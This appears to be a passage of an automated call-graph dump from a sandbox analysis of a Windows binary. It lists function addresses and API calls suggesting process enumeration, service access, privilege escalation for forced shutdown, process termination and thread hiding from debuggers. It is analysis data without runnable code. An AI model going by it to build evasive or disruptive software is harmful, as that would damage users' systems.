6c2e6a43 std::_Facet_Register 4 API calls 100176->100180 100177 6c177dc9 100179 6c2e6a43 std::_Facet_Register 4 API calls 100177->100179 100178->100144 100178->100176 100178->100177 100181 6c177d7c _Yarn 100178->100181 100179->100181 100180->100181 100182 6c2e5960 104 API calls 100181->100182 100183 6c177e2f std::ios_base::_Ios_base_dtor _strlen 100182->100183 100183->100123 100184 6c1785bf 100183->100184 100185 6c1785a8 100183->100185 100192 6c178556 _Yarn _strlen 100183->100192 100187 6c2e6a43 std::_Facet_Register 4 API calls 100184->100187 100186 6c2e6a43 std::_Facet_Register 4 API calls 100185->100186 100186->100192 100187->100192 100188 6c178983 100191 6c2e6a43 std::_Facet_Register 4 API calls 100188->100191 100189 6c17896a 100190 6c2e6a43 std::_Facet_Register 4 API calls 100189->100190 100193 6c17891d _Yarn 100190->100193 100191->100193 100192->100144 100192->100188 100192->100189 100192->100193 100194 6c2e5960 104 API calls 100193->100194 100197 6c1789d0 std::ios_base::_Ios_base_dtor _strlen 100194->100197 100195 6c178f36 100199 6c2e6a43 std::_Facet_Register 4 API calls 100195->100199 100196 6c178f1f 100198 6c2e6a43 std::_Facet_Register 4 API calls 100196->100198 100197->100123 100197->100195 100197->100196 100202 6c178ecd _Yarn _strlen 100197->100202 100198->100202 100199->100202 100200 6c179354 100203 6c2e6a43 std::_Facet_Register 4 API calls 100200->100203 100201 6c17936d 100204 6c2e6a43 std::_Facet_Register 4 API calls 100201->100204 100202->100144 100202->100200 100202->100201 100205 6c179307 _Yarn 100202->100205 100203->100205 100204->100205 100206 6c2e5960 104 API calls 100205->100206 100209 6c1793ba std::ios_base::_Ios_base_dtor 100206->100209 100207 6c2e6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100207->100211 100208 6c2e4ff0 4 API calls 100208->100137 100209->100123 100209->100208 100210 6c2e5960 104 API calls 100210->100211 100211->100123 100211->100137 100211->100143 100211->100144 100211->100207 100211->100210 100212 6c2e4ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 100211->100212 100212->100211 100214 6c2daed4 100213->100214 100215 6c2daed6 FindFirstFileA 100213->100215 100214->100215 100216 6c2daf10 100215->100216 100217 6c2daf14 FindClose 100216->100217 100218 6c2daf72 100216->100218 100217->100216 100218->100133 100220 6c2e50ca 100219->100220 100221 6c2e5080 WaitForSingleObject CloseHandle CloseHandle 100220->100221 100222 6c2e50e3 100220->100222 100221->100220 100222->100142 100224 6c2e59b7 100223->100224 100256 6c2e5ff0 100224->100256 100226 6c2e59c8 100275 6c186ba0 100226->100275 100228 6c2e5a67 100327 6c1ae010 100228->100327 100230 6c2e5a9f std::ios_base::_Ios_base_dtor 100232 6c1ae010 67 API calls 100230->100232 100234 6c2e5ae2 std::ios_base::_Ios_base_dtor 100232->100234 100233 6c2e5a54 100312 6c2e5b90 100233->100312 100234->100156 100237 6c2e59ec 100237->100228 100237->100233 100294 6c2e6340 100237->100294 100302 6c1c2000 100237->100302 100238 6c2e5a5c 100333 6c187090 100238->100333 100241 6c2e6a48 100240->100241 100242 6c2e6a62 100241->100242 100244 6c2e6a64 std::_Facet_Register 100241->100244 100792 6c2ef014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100241->100792 100242->100130 100245 6c2e78c3 std::_Facet_Register 100244->100245 100793 6c2e9379 RaiseException 100244->100793 100796 6c2e9379 RaiseException 100245->100796 100248 6c2e80bc IsProcessorFeaturePresent 100253 6c2e80e1 100248->100253 100249 6c2e7883 100794 6c2e9379 RaiseException 100249->100794 100251 6c2e78a3 std::invalid_argument::invalid_argument 100795 6c2e9379 RaiseException 100251->100795 100253->100130 100255->100146 100257 6c2e6025 100256->100257 100346 6c1b2020 100257->100346 100259 6c2e60c6 100260 6c2e6a43 std::_Facet_Register 4 API calls 100259->100260 100261 6c2e60fe 100260->100261 100363 6c2e7327 100261->100363 100263 6c2e6112 100375 6c1b1d90 100263->100375 100266 6c2e61ec 100266->100226 100268 6c2e6226 100383 6c1b26e0 24 API calls 4 library calls 100268->100383 100270 6c2e6238 100384 6c2e9379 RaiseException 100270->100384 100272 6c2e624d 100273 6c1ae010 67 API calls 100272->100273 100274 6c2e625f 100273->100274 100274->100226 100276 6c186bd5 100275->100276 100277 6c1b2020 52 API calls 100276->100277 100278 6c186c68 100277->100278 100279 6c2e6a43 std::_Facet_Register 4 API calls 100278->100279 100280 6c186ca0 100279->100280 100281 6c2e7327 43 API calls 100280->100281 100282 6c186cb4 100281->100282 100283 6c1b1d90 89 API calls 100282->100283 100284 6c186d5d 100283->100284 100285 6c186d8e 100284->100285 100694 6c1b2250 30 API calls 100284->100694 100285->100237 100287 6c186dc8 100695 6c1b26e0 24 API calls 4 library calls 100287->100695 100289 6c186dda 100696 6c2e9379 RaiseException 100289->100696 100291 6c186def 100292 6c1ae010 67 API calls 100291->100292 100293 6c186e0f 100292->100293 100293->100237 100295 6c2e638d 100294->100295 100697 6c2e65a0 100295->100697 100297 6c2e647c 100297->100237 100300 6c2e63a5 100300->100297 100715 6c1b2250 30 API calls 100300->100715 100716 6c1b26e0 24 API calls 4 library calls 100300->100716 100717 6c2e9379 RaiseException 100300->100717 100303 6c1c203f 100302->100303 100306 6c1c2053 100303->100306 100726 6c1b3560 32 API calls std::_Xinvalid_argument 100303->100726 100308 6c1c210e 100306->100308 100728 6c1b2250 30 API calls 100306->100728 100729 6c1b26e0 24 API calls 4 library calls 100306->100729 100730 6c2e9379 RaiseException 100306->100730 100309 6c1c2121 100308->100309 100727 6c1b37e0 32 API calls std::_Xinvalid_argument 100308->100727 100309->100237 100313 6c2e5b9e 100312->100313 100314 6c2e5bd1 100312->100314 100731 6c1b01f0 100313->100731 100315 6c2e5c83 100314->100315 100735 6c1b2250 30 API calls 100314->100735 100315->100238 100319 6c2f0b18 67 API calls 100319->100314 100320 6c2e5cae 100736 6c1b2340 24 API calls 100320->100736 100322 6c2e5cbe 100737 6c2e9379 RaiseException 100322->100737 100324 6c2e5cc9 100325 6c1ae010 67 API calls 100324->100325 100326 6c2e5d22 std::ios_base::_Ios_base_dtor 100325->100326 100326->100238 100328 6c1ae04b 100327->100328 100329 6c1ae0a3 100328->100329 100330 6c1b01f0 64 API calls 100328->100330 100329->100230 100331 6c1ae098 100330->100331 100332 6c2f0b18 67 API calls 100331->100332 100332->100329 100334 6c18709e 100333->100334 100337 6c1870d1 100333->100337 100336 6c1b01f0 64 API calls 100334->100336 100335 6c187183 100335->100228 100338 6c1870c4 100336->100338 100337->100335 100789 6c1b2250 30 API calls 100337->100789 100340 6c2f0b18 67 API calls 100338->100340 100340->100337 100341 6c1871ae 100790 6c1b2340 24 API calls 100341->100790 100343 6c1871be 100791 6c2e9379 RaiseException 100343->100791 100345 6c1871c9 100347 6c2e6a43 std::_Facet_Register 4 API calls 100346->100347 100348 6c1b207e 100347->100348 100349 6c2e7327 43 API calls 100348->100349 100350 6c1b2092 100349->100350 100385 6c1b2f60 42 API calls 4 library calls 100350->100385 100352 6c1b20c8 100353 6c1b210d 100352->100353 100354 6c1b2136 100352->100354 100357 6c1b2120 100353->100357 100386 6c2e6f8e 9 API calls 2 library calls 100353->100386 100387 6c1b2250 30 API calls 100354->100387 100357->100259 100358 6c1b215b 100388 6c1b2340 24 API calls 100358->100388 100360 6c1b2171 100389 6c2e9379 RaiseException 100360->100389 100362 6c1b217c 100362->100259 100364 6c2e7333 __EH_prolog3 100363->100364 100390 6c2e6eb5 100364->100390 100367 6c2e736f 100396 6c2e6ee6 100367->100396 100370 6c2e7351 100404 6c2e73ba 39 API calls std::locale::_Setgloballocale 100370->100404 100372 6c2e7359 100405 6c2e71b1 HeapFree GetLastError _Yarn ___std_exception_destroy 100372->100405 100374 6c2e73ac 100374->100263 100376 6c1b1ddc 100375->100376 100377 6c1b1dc7 100375->100377 100410 6c2e7447 100376->100410 100377->100266 100382 6c1b2250 30 API calls 100377->100382 100381 6c1b1e82 100382->100268 100383->100270 100384->100272 100385->100352 100386->100357 100387->100358 100388->100360 100389->100362 100391 6c2e6ec4 100390->100391 100392 6c2e6ecb 100390->100392 100406 6c2f03cd 6 API calls std::_Lockit::_Lockit 100391->100406 100394 6c2e6ec9 100392->100394 100407 6c2e858b EnterCriticalSection 100392->100407 100394->100367 100403 6c2e7230 6 API calls 2 library calls 100394->100403 100397 6c2f03db 100396->100397 100398 6c2e6ef0 100396->100398 100409 6c2f03b6 LeaveCriticalSection 100397->100409 100400 6c2e6f03 100398->100400 100408 6c2e8599 LeaveCriticalSection 100398->100408 100400->100374 100401 6c2f03e2 100401->100374 100403->100370 100404->100372 100405->100367 100406->100394 100407->100394 100408->100400 100409->100401 100411 6c2e7450 100410->100411 100417 6c1b1dea 100411->100417 100419 6c2efd4a 100411->100419 100413 6c2e749c 100413->100417 100430 6c2efa58 65 API calls 100413->100430 100415 6c2e74b7 100415->100417 100431 6c2f0b18 100415->100431 100417->100377 100418 6c2ec563 18 API calls __cftoe 100417->100418 100418->100381 100420 6c2efd55 __wsopen_s 100419->100420 100421 6c2efd68 100420->100421 100422 6c2efd88 100420->100422 100456 6c2f0120 18 API calls __cftoe 100421->100456 100426 6c2efd78 100422->100426 100442 6c2fae0c 100422->100442 100426->100413 100430->100415 100432 6c2f0b24 __wsopen_s 100431->100432 100433 6c2f0b2e 100432->100433 100434 6c2f0b43 100432->100434 100580 6c2f0120 18 API calls __cftoe 100433->100580 100438 6c2f0b3e 100434->100438 100565 6c2ec5a9 EnterCriticalSection 100434->100565 100437 6c2f0b60 100566 6c2f0b9c 100437->100566 100438->100417 100440 6c2f0b6b 100581 6c2f0b92 LeaveCriticalSection 100440->100581 100443 6c2fae18 __wsopen_s 100442->100443 100458 6c2f039f EnterCriticalSection 100443->100458 100445 6c2fae26 100459 6c2faeb0 100445->100459 100450 6c2faf72 100451 6c2fb091 100450->100451 100483 6c2fb114 100451->100483 100454 6c2efdcc 100457 6c2efdf5 LeaveCriticalSection 100454->100457 100456->100426 100457->100426 100458->100445 100467 6c2faed3 100459->100467 100460 6c2fae33 100473 6c2fae6c 100460->100473 100461 6c2faf2b 100478 6c2f71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100461->100478 100463 6c2faf34 100479 6c2f47bb HeapFree GetLastError __dosmaperr 100463->100479 100466 6c2faf3d 100466->100460 100480 6c2f6c1f 6 API calls std::_Lockit::_Lockit 100466->100480 100467->100460 100467->100461 100467->100467 100476 6c2ec5a9 EnterCriticalSection 100467->100476 100477 6c2ec5bd LeaveCriticalSection 100467->100477 100470 6c2faf5c 100481 6c2ec5a9 EnterCriticalSection 100470->100481 100472 6c2faf6f 100472->100460 100482 6c2f03b6 LeaveCriticalSection 100473->100482 100475 6c2efda3 100475->100426 100475->100450 100476->100467 100477->100467 100478->100463 100479->100466 100480->100470 100481->100472 100482->100475 100484 6c2fb133 100483->100484 100485 6c2fb146 100484->100485 100489 6c2fb15b 100484->100489 100499 6c2f0120 18 API calls __cftoe 100485->100499 100487 6c2fb0a7 100487->100454 100496 6c303fde 100487->100496 100494 6c2fb27b 100489->100494 100500 6c303ea8 37 API calls __cftoe 100489->100500 100491 6c2fb2cb 100491->100494 100501 6c303ea8 37 API calls __cftoe 100491->100501 100493 6c2fb2e9 100493->100494 100502 6c303ea8 37 API calls __cftoe 100493->100502 100494->100487 100503 6c2f0120 18 API calls __cftoe 100494->100503 100504 6c304396 100496->100504 100499->100487 100500->100491 100501->100493 100502->100494 100503->100487 100505 6c3043a2 __wsopen_s 100504->100505 100506 6c3043a9 100505->100506 100507 6c3043d4 100505->100507 100522 6c2f0120 18 API calls __cftoe 100506->100522 100513 6c303ffe 100507->100513 100512 6c303ff9 100512->100454 100524 6c2f06cb 100513->100524 100518 6c304034 100520 6c304066 100518->100520 100564 6c2f47bb HeapFree GetLastError __dosmaperr 100518->100564 100523 6c30442b LeaveCriticalSection __wsopen_s 100520->100523 100522->100512 100523->100512 100525 6c2ebceb __cftoe 37 API calls 100524->100525 100526 6c2f06dd 100525->100526 100527 6c2f06ef 100526->100527 100528 6c2f69d5 __wsopen_s 5 API calls 100526->100528 100529 6c2ebdf6 100527->100529 100528->100527 100530 6c2ebe4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 100529->100530 100531 6c2ebe0e 100530->100531 100531->100518 100532 6c30406c 100531->100532 100533 6c3044ec __wsopen_s 18 API calls 100532->100533 100534 6c304089 100533->100534 100535 6c30160c __wsopen_s 14 API calls 100534->100535 100538 6c30409e __dosmaperr 100534->100538 100536 6c3040bc 100535->100536 100537 6c304457 __wsopen_s CreateFileW 100536->100537 100536->100538 100543 6c304115 100537->100543 100538->100518 100539 6c304192 GetFileType 100540 6c3041e4 100539->100540 100541 6c30419d GetLastError 100539->100541 100547 6c3017b0 __wsopen_s SetStdHandle 100540->100547 100544 6c2ef9f2 __dosmaperr 100541->100544 100542 6c304167 GetLastError 100542->100538 100543->100539 100543->100542 100545 6c304457 __wsopen_s CreateFileW 100543->100545 100546 6c3041ab CloseHandle 100544->100546 100548 6c30415a 100545->100548 100546->100538 100561 6c3041d4 100546->100561 100549 6c304205 100547->100549 100548->100539 100548->100542 100550 6c304251 100549->100550 100551 6c304666 __wsopen_s 70 API calls 100549->100551 100552 6c304710 __wsopen_s 70 API calls 100550->100552 100554 6c304258 100550->100554 100551->100550 100553 6c304286 100552->100553 100553->100554 100555 6c304294 100553->100555 100556 6c2fb925 __wsopen_s 21 API calls 100554->100556 100555->100538 100557 6c304310 CloseHandle 100555->100557 100556->100538 100558 6c304457 __wsopen_s CreateFileW 100557->100558 100559 6c30433b 100558->100559 100560 6c304345 GetLastError 100559->100560 100559->100561 100562 6c304351 __dosmaperr 100560->100562 100561->100538 100563 6c30171f __wsopen_s SetStdHandle 100562->100563 100563->100561 100564->100520 100565->100437 100567 6c2f0bbe 100566->100567 100568 6c2f0ba9 100566->100568 100571 6c2f0bb9 100567->100571 100582 6c2f0cb9 100567->100582 100604 6c2f0120 18 API calls __cftoe 100568->100604 100571->100440 100576 6c2f0be1 100597 6c2fb898 100576->100597 100578 6c2f0be7 100578->100571 100605 6c2f47bb HeapFree GetLastError __dosmaperr 100578->100605 100580->100438 100581->100438 100583 6c2f0cd1 100582->100583 100587 6c2f0bd3 100582->100587 100584 6c2f9c60 18 API calls 100583->100584 100583->100587 100585 6c2f0cef 100584->100585 100606 6c2fbb6c 100585->100606 100588 6c2f873e 100587->100588 100589 6c2f0bdb 100588->100589 100590 6c2f8755 100588->100590 100592 6c2f9c60 100589->100592 100590->100589 100662 6c2f47bb HeapFree GetLastError __dosmaperr 100590->100662 100593 6c2f9c81 100592->100593 100594 6c2f9c6c 100592->100594 100593->100576 100663 6c2f0120 18 API calls __cftoe 100594->100663 100596 6c2f9c7c 100596->100576 100598 6c2fb8be 100597->100598 100602 6c2fb8a9 __dosmaperr 100597->100602 100599 6c2fb8e5 100598->100599 100600 6c2fb907 __dosmaperr 100598->100600 100664 6c2fb9c1 100599->100664 100672 6c2f0120 18 API calls __cftoe 100600->100672 100602->100578 100604->100571 100605->100571 100607 6c2fbb78 __wsopen_s 100606->100607 100608 6c2fbbca 100607->100608 100609 6c2fbc33 __dosmaperr 100607->100609 100613 6c2fbb80 __dosmaperr 100607->100613 100617 6c301990 EnterCriticalSection 100608->100617 100647 6c2f0120 18 API calls __cftoe 100609->100647 100611 6c2fbbd0 100615 6c2fbbec __dosmaperr 100611->100615 100618 6c2fbc5e 100611->100618 100613->100587 100646 6c2fbc2b LeaveCriticalSection __wsopen_s 100615->100646 100617->100611 100619 6c2fbc80 100618->100619 100645 6c2fbc9c __dosmaperr 100618->100645 100620 6c2fbcd4 100619->100620 100621 6c2fbc84 __dosmaperr 100619->100621 100622 6c2fbce7 100620->100622 100656 6c2fac69 20 API calls __wsopen_s 100620->100656 100655 6c2f0120 18 API calls __cftoe 100621->100655 100648 6c2fbe40 100622->100648 100627 6c2fbcfd 100629 6c2fbd26 100627->100629 100630 6c2fbd01 100627->100630 100628 6c2fbd3c 100631 6c2fbd95 WriteFile 100628->100631 100632 6c2fbd50 100628->100632 100658 6c2fbeb1 43 API calls 5 library calls 100629->100658 100630->100645 100657 6c2fc25b 6 API calls __wsopen_s 100630->100657 100634 6c2fbdb9 GetLastError 100631->100634 100631->100645 100635 6c2fbd5b 100632->100635 100636 6c2fbd85 100632->100636 100634->100645 100639 6c2fbd75 100635->100639 100640 6c2fbd60 100635->100640 100661 6c2fc2c3 7 API calls 2 library calls 100636->100661 100660 6c2fc487 8 API calls 3 library calls 100639->100660 100643 6c2fbd65 100640->100643 100640->100645 100642 6c2fbd73 100642->100645 100659 6c2fc39e 7 API calls 2 library calls 100643->100659 100645->100615 100646->100613 100647->100613 100649 6c3019e5 __wsopen_s 18 API calls 100648->100649 100650 6c2fbe51 100649->100650 100651 6c2fbcf8 100650->100651 100652 6c2f49b2 __Getctype 37 API calls 100650->100652 100651->100627 100651->100628 100653 6c2fbe74 100652->100653 100653->100651 100654 6c2fbe8e GetConsoleMode 100653->100654 100654->100651 100655->100645 100656->100622 100657->100645 100658->100645 100659->100642 100660->100642 100661->100642 100662->100589 100663->100596 100665 6c2fb9cd __wsopen_s 100664->100665 100673 6c301990 EnterCriticalSection 100665->100673 100667 6c2fb9db 100669 6c2fba08 100667->100669 100674 6c2fb925 100667->100674 100687 6c2fba41 LeaveCriticalSection __wsopen_s 100669->100687 100671 6c2fba2a 100671->100602 100672->100602 100673->100667 100688 6c3015a2 100674->100688 100676 6c2fb935 100677 6c2fb93b 100676->100677 100679 6c3015a2 __wsopen_s 18 API calls 100676->100679 100686 6c2fb96d 100676->100686 100693 6c30171f SetStdHandle __dosmaperr __wsopen_s 100677->100693 100681 6c2fb964 100679->100681 100680 6c3015a2 __wsopen_s 18 API calls 100682 6c2fb979 CloseHandle 100680->100682 100684 6c3015a2 __wsopen_s 18 API calls 100681->100684 100682->100677 100685 6c2fb985 GetLastError 100682->100685 100683 6c2fb993 __dosmaperr 100683->100669 100684->100686 100685->100677 100686->100677 100686->100680 100687->100671 100690 6c3015c4 __dosmaperr 100688->100690 100691 6c3015af __dosmaperr 100688->100691 100689 6c3015e9 100689->100676 100690->100689 100692 6c2f0120 __cftoe 18 API calls 100690->100692 100691->100676 100692->100691 100693->100683 100694->100287 100695->100289 100696->100291 100698 6c2e65dc 100697->100698 100699 6c2e6608 100697->100699 100700 6c2e6601 100698->100700 100720 6c1b2250 30 API calls 100698->100720 100706 6c2e6619 100699->100706 100718 6c1b3560 32 API calls std::_Xinvalid_argument 100699->100718 100700->100300 100703 6c2e67e8 100721 6c1b2340 24 API calls 100703->100721 100705 6c2e67f7 100722 6c2e9379 RaiseException 100705->100722 100706->100700 100719 6c1b2f60 42 API calls 4 library calls 100706->100719 100709 6c2e6653 100709->100700 100723 6c1b2250 30 API calls 100709->100723 100711 6c2e6827 100724 6c1b2340 24 API calls 100711->100724 100713 6c2e683d 100725 6c2e9379 RaiseException 100713->100725 100715->100300 100716->100300 100717->100300 100718->100706 100719->100709 100720->100703 100721->100705 100722->100709 100723->100711 100724->100713 100725->100700 100726->100306 100727->100309 100728->100306 100729->100306 100730->100306 100732 6c1b022e 100731->100732 100733 6c1b04d6 100732->100733 100738 6c2f17db 100732->100738 100733->100319 100735->100320 100736->100322 100737->100324 100739 6c2f17e9 100738->100739 100740 6c2f1806 100738->100740 100739->100740 100741 6c2f180a 100739->100741 100744 6c2f17f6 100739->100744 100740->100732 100746 6c2f1a02 100741->100746 100754 6c2f0120 18 API calls __cftoe 100744->100754 100747 6c2f1a0e __wsopen_s 100746->100747 100755 6c2ec5a9 EnterCriticalSection 100747->100755 100749 6c2f1a1c 100756 6c2f19bf 100749->100756 100753 6c2f183c 100753->100732 100754->100740 100755->100749 100764 6c2f85a6 100756->100764 100762 6c2f19f9 100763 6c2f1a51 LeaveCriticalSection 100762->100763 100763->100753 100765 6c2f9c60 18 API calls 100764->100765 100766 6c2f85b7 100765->100766 100781 6c3019e5 100766->100781 100768 6c2f85bd __wsopen_s 100769 6c2f19d3 100768->100769 100786 6c2f47bb HeapFree GetLastError __dosmaperr 100768->100786 100771 6c2f183e 100769->100771 100773 6c2f1850 100771->100773 100775 6c2f186e 100771->100775 100772 6c2f185e 100788 6c2f0120 18 API calls __cftoe 100772->100788 100773->100772 100773->100775 100778 6c2f1886 _Yarn 100773->100778 100780 6c2f8659 62 API calls 100775->100780 100776 6c2f0cb9 62 API calls 100776->100778 100777 6c2f9c60 18 API calls 100777->100778 100778->100775 100778->100776 100778->100777 100779 6c2fbb6c __wsopen_s 62 API calls 100778->100779 100779->100778 100780->100762 100783 6c3019f2 100781->100783 100784 6c3019ff 100781->100784 100782 6c301a0b 100782->100768 100783->100768 100784->100782 100787 6c2f0120 18 API calls __cftoe 100784->100787 100786->100769 100787->100783 100788->100775 100789->100341 100790->100343 100791->100345 100792->100241 100793->100249 100794->100251 100795->100245 100796->100248 100797 6c2eef3f 100798 6c2eef4b __wsopen_s 100797->100798 100799 6c2eef5f 100798->100799 100800 6c2eef52 GetLastError ExitThread 100798->100800 100809 6c2f49b2 GetLastError 100799->100809 100806 6c2eef7b 100842 6c2eeeaa 16 API calls 2 library calls 100806->100842 100808 6c2eef9d 100810 6c2f49c9 100809->100810 100811 6c2f49cf 100809->100811 100843 6c2f6b23 6 API calls std::_Lockit::_Lockit 100810->100843 100815 6c2f49d5 SetLastError 100811->100815 100844 6c2f6b62 6 API calls std::_Lockit::_Lockit 100811->100844 100814 6c2f49ed 100814->100815 100816 6c2f49f1 100814->100816 100822 6c2f4a69 100815->100822 100823 6c2eef64 100815->100823 100845 6c2f71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 100816->100845 100818 6c2f49fd 100820 6c2f4a1c 100818->100820 100821 6c2f4a05 100818->100821 100848 6c2f6b62 6 API calls std::_Lockit::_Lockit 100820->100848 100846 6c2f6b62 6 API calls std::_Lockit::_Lockit 100821->100846 100851 6c2f0ac9 37 API calls std::locale::_Setgloballocale 100822->100851 100836 6c2f9d66 100823->100836 100827 6c2f4a13 100847 6c2f47bb HeapFree GetLastError __dosmaperr 100827->100847 100829 6c2f4a28 100830 6c2f4a3d 100829->100830 100831 6c2f4a2c 100829->100831 100850 6c2f47bb HeapFree GetLastError __dosmaperr 100830->100850 100849 6c2f6b62 6 API calls std::_Lockit::_Lockit 100831->100849 100834 6c2f4a19 100834->100815 100837 6c2f9d78 GetPEB 100836->100837 100840 6c2eef6f 100836->100840 100838 6c2f9d8b 100837->100838 100837->100840 100852 6c2f6e18 5 API calls std::_Lockit::_Lockit 100838->100852 100840->100806 100841 6c2f6d6f 5 API calls std::_Lockit::_Lockit 100840->100841 100841->100806 100842->100808 100843->100811 100844->100814 100845->100818 100846->100827 100847->100834 100848->100829 100849->100827 100850->100834 100852->100840 100853 6c163d62 100855 6c163bc0 100853->100855 100854 6c163e8a GetCurrentThread NtSetInformationThread 100856 6c163eea 100854->100856 100855->100854 100857 6c164b53 100858 6c2e6a43 std::_Facet_Register 4 API calls 100857->100858 100859 6c164b5c _Yarn 100858->100859 100860 6c2daec0 2 API calls 100859->100860 100865 6c164bae std::ios_base::_Ios_base_dtor 100860->100865 100861 6c18639e 101048 6c2f0130 18 API calls 2 library calls 100861->101048 100863 6c164cff 100864 6c165164 CreateFileA CloseHandle 100869 6c1651ec 100864->100869 100865->100861 100865->100863 100865->100864 100866 6c17245a _Yarn _strlen 100865->100866 100866->100861 100867 6c2daec0 2 API calls 100866->100867 100873 6c172a83 std::ios_base::_Ios_base_dtor 100867->100873 101015 6c2e5120 OpenSCManagerA 100869->101015 100870 6c16fc00 101041 6c2e5240 CreateToolhelp32Snapshot 100870->101041 100871 6c1863b2 101049 6c1615e0 18 API calls std::ios_base::_Ios_base_dtor 100871->101049 100873->100861 101019 6c2d0390 100873->101019 100876 6c2e6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100909 6c165478 std::ios_base::_Ios_base_dtor _Yarn _strlen 100876->100909 100878 6c1737d0 Sleep 100921 6c1737e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100878->100921 100879 6c2daec0 2 API calls 100879->100909 100880 6c2e5240 4 API calls 100898 6c17053a 100880->100898 100881 6c2e5240 4 API calls 100905 6c1712e2 100881->100905 100883 6c16ffe3 100883->100880 100893 6c170abc 100883->100893 100884 6c1864f8 100885 6c186ba0 104 API calls 100885->100909 100886 6c186e60 32 API calls 100886->100909 100888 6c2e5240 4 API calls 100888->100893 100889 6c187090 77 API calls 100889->100909 100890 6c2e5240 4 API calls 100911 6c171dd9 100890->100911 100891 6c166722 101038 6c2e1880 25 API calls 4 library calls 100891->101038 100892 6c17211c 100892->100866 100894 6c17241a 100892->100894 100893->100866 100893->100881 100897 6c2d0390 11 API calls 100894->100897 100895 6c2daec0 2 API calls 100895->100921 100896 6c1ae010 67 API calls 100896->100909 100899 6c17244d 100897->100899 100898->100888 100898->100893 101047 6c2e5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100899->101047 100901 6c172452 Sleep 100901->100866 100902 6c166162 100903 6c16740b 100904 6c2e4ff0 4 API calls 100903->100904 100913 6c16775a _strlen 100904->100913 100905->100890 100905->100892 100914 6c1716ac 100905->100914 100906 6c2e5240 4 API calls 100906->100892 100907 6c186ba0 104 API calls 100907->100921 100909->100861 100909->100870 100909->100876 100909->100879 100909->100885 100909->100886 100909->100889 100909->100891 100909->100896 100909->100902 100910 6c187090 77 API calls 100910->100921 100911->100892 100911->100906 100912 6c1ae010 67 API calls 100912->100921 100913->100861 100915 6c167b92 100913->100915 100916 6c167ba9 100913->100916 100919 6c167b43 _Yarn 100913->100919 100917 6c2e6a43 std::_Facet_Register 4 API calls 100915->100917 100918 6c2e6a43 std::_Facet_Register 4 API calls 100916->100918 100917->100919 100918->100919 100920 6c2daec0 2 API calls 100919->100920 100930 6c167be7 std::ios_base::_Ios_base_dtor 100920->100930 100921->100861 100921->100895 100921->100907 100921->100910 100921->100912 101028 6c186e60 100921->101028 100922 6c2e4ff0 4 API calls 100933 6c168a07 100922->100933 100923 6c169d7f 100927 6c2e6a43 std::_Facet_Register 4 API calls 100923->100927 100924 6c169d68 100926 6c2e6a43 std::_Facet_Register 4 API calls 100924->100926 100925 6c16962c _strlen 100925->100861 100925->100923 100925->100924 100928 6c169d18 _Yarn 100925->100928 100926->100928 100927->100928 100929 6c2daec0 2 API calls 100928->100929 100937 6c169dbd std::ios_base::_Ios_base_dtor 100929->100937 100930->100861 100930->100922 100930->100925 100931 6c168387 100930->100931 100932 6c2e4ff0 4 API calls 100941 6c169120 100932->100941 100933->100932 100934 6c2e4ff0 4 API calls 100951 6c16a215 _strlen 100934->100951 100935 6c2e4ff0 4 API calls 100936 6c169624 100935->100936 101039 6c2e5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100936->101039 100937->100861 100937->100934 100942 6c16e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100937->100942 100938 6c2e6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100938->100942 100940 6c2daec0 2 API calls 100940->100942 100941->100935 100942->100861 100942->100938 100942->100940 100943 6c16ed02 Sleep 100942->100943 100944 6c16f7b1 100942->100944 100963 6c16e8c1 100943->100963 101040 6c2e5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100944->101040 100946 6c16e8dd GetCurrentProcess TerminateProcess 100946->100942 100947 6c16a9a4 100949 6c2e6a43 std::_Facet_Register 4 API calls 100947->100949 100948 6c16a9bb 100950 6c2e6a43 std::_Facet_Register 4 API calls 100948->100950 100960 6c16a953 _Yarn _strlen 100949->100960 100950->100960 100951->100861 100951->100947 100951->100948 100951->100960 100952 6c2e4ff0 4 API calls 100952->100963 100953 6c16fbb8 100955 6c16fbe8 ExitWindowsEx Sleep 100953->100955 100954 6c16f7c0 100954->100953 100955->100870 100956 6c16aff0 100958 6c2e6a43 std::_Facet_Register 4 API calls 100956->100958 100957 6c16b009 100959 6c2e6a43 std::_Facet_Register 4 API calls 100957->100959 100961 6c16afa0 _Yarn 100958->100961 100959->100961 100960->100871 100960->100956 100960->100957 100960->100961 100962 6c2e5960 104 API calls 100961->100962 100964 6c16b059 std::ios_base::_Ios_base_dtor _strlen 100962->100964 100963->100942 100963->100946 100963->100952 100964->100861 100965 6c16b443 100964->100965 100966 6c16b42c 100964->100966 100969 6c16b3da _Yarn _strlen 100964->100969 100968 6c2e6a43 std::_Facet_Register 4 API calls 100965->100968 100967 6c2e6a43 std::_Facet_Register 4 API calls 100966->100967 100967->100969 100968->100969 100969->100871 100970 6c16b7b7 100969->100970 100971 6c16b79e 100969->100971 100974 6c16b751 _Yarn 100969->100974 100973 6c2e6a43 std::_Facet_Register 4 API calls 100970->100973 100972 6c2e6a43 std::_Facet_Register 4 API calls 100971->100972 100972->100974 100973->100974 100975 6c2e5960 104 API calls 100974->100975 100976 6c16b804 std::ios_base::_Ios_base_dtor _strlen 100975->100976 100976->100861 100977 6c16bc26 100976->100977 100978 6c16bc0f 100976->100978 100981 6c16bbbd _Yarn _strlen 100976->100981 100980 6c2e6a43 std::_Facet_Register 4 API calls 100977->100980 100979 6c2e6a43 std::_Facet_Register 4 API calls 100978->100979 100979->100981 100980->100981 100981->100871 100982 6c16c075 100981->100982 100983 6c16c08e 100981->100983 100986 6c16c028 _Yarn 100981->100986 100984 6c2e6a43 std::_Facet_Register 4 API calls 100982->100984 100985 